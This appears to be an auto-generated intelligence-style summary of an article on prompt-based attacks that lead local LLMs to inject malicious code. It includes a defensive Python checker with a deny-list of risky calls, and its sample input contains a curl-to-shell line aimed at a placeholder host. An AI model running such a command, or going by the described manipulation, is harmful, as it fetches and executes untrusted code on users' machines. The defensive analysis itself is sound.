The security paradox of local LLMs – Quesma.com

Published on: 2025-10-22

Intelligence Report: The Security Paradox of Local LLMs – Quesma.com

1. BLUF (Bottom Line Up Front)



Local Large Language Models (LLMs) are highly susceptible to prompt-based attacks that lead them to introduce malicious code. The best-supported hypothesis is that local LLMs, because of their inherent design and operational constraints, are easier to exploit than centralized models. Confidence level: High. Recommended action: Strengthen security protocols for local LLM deployments and develop robust detection mechanisms for prompt-based attacks.

2. Competing Hypotheses



Hypothesis 1: Local LLMs are inherently more vulnerable to security threats because they cannot reliably recognize and mitigate prompt-based attacks, which increases the risk of code injection and data breaches.

Hypothesis 2: The vulnerabilities in local LLMs are not significantly different from those in centralized models; rather, the perception of increased risk is due to a lack of standardized security practices and awareness among developers deploying these models locally.



Under Analysis of Competing Hypotheses (ACH) 2.0, Hypothesis 1 is better supported, given documented instances of successful prompt-based attacks that exploit local LLMs’ limited ability to recognize malicious intent. Hypothesis 2 is less well supported because it underestimates the challenges specific to local deployments.

3. Key Assumptions and Red Flags

The analysis assumes that local LLMs receive less security oversight than centralized models and that developers may not fully understand the security implications of deploying LLMs locally. A red flag is the potential underreporting of successful attacks, which would skew any picture of the threat landscape. A blind spot is the assumption that centralized models are inherently more secure, which ignores their own vulnerabilities.

4. Implications and Strategic Risks

The proliferation of local LLMs without adequate security measures could lead to widespread exploitation, resulting in data breaches and unauthorized access to sensitive information. This scenario poses significant economic risks, particularly for businesses relying on these models for critical operations. Additionally, there is a geopolitical risk if state actors exploit these vulnerabilities for espionage or cyber warfare.

5. Recommendations and Outlook

- Develop and implement comprehensive security guidelines for local LLM deployments, focusing on prompt-based attack detection and mitigation.

- Invest in training programs for developers to enhance awareness of LLM-specific security risks.

- Scenario-based projections:

  - Best Case: Adoption of robust security measures leads to a significant reduction in successful attacks on local LLMs.

  - Worst Case: Continued exploitation of local LLM vulnerabilities results in major data breaches and loss of trust in AI technologies.

  - Most Likely: Incremental improvements in security practices reduce but do not eliminate the risk of exploitation.
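
One possible form of the detection and mitigation recommended above is to inspect model-generated code before it is executed. The following is a minimal sketch, not a method described in the source: it assumes the generated code is Python, and the deny-list `RISKY_CALLS` and the helper names `dotted_name` and `find_risky_calls` are hypothetical choices made for illustration.

```python
import ast

# Hypothetical deny-list for illustration only; a real policy would be
# broader and tuned to the deployment.
RISKY_CALLS = {
    "eval", "exec", "compile", "__import__",
    "os.system", "subprocess.run", "subprocess.Popen",
}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_risky_calls(source):
    """Parse generated code and list (line, call name) for deny-listed calls.

    Raises SyntaxError if the source is not valid Python.
    """
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


if __name__ == "__main__":
    # Stand-in for code returned by a local model (hypothetical example).
    generated = (
        "import os\n"
        "x = 1 + 1\n"
        "os.system('curl http://example.invalid | sh')\n"
        "print(eval('x'))\n"
    )
    for line, name in find_risky_calls(generated):
        print(f"line {line}: call to {name} needs human review")
```

A check like this is only a first filter. It matches call names literally, so aliasing (for example `from os import system`) or string-built code slips past it. It would need to be combined with sandboxed execution and human review rather than relied on alone.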

6. Key Individuals and Entities

No specific individuals are mentioned in the source text. Entities involved include developers deploying local LLMs and potential attackers exploiting these models.



7. Thematic Tags

national security threats, cybersecurity, counter-terrorism, regional focus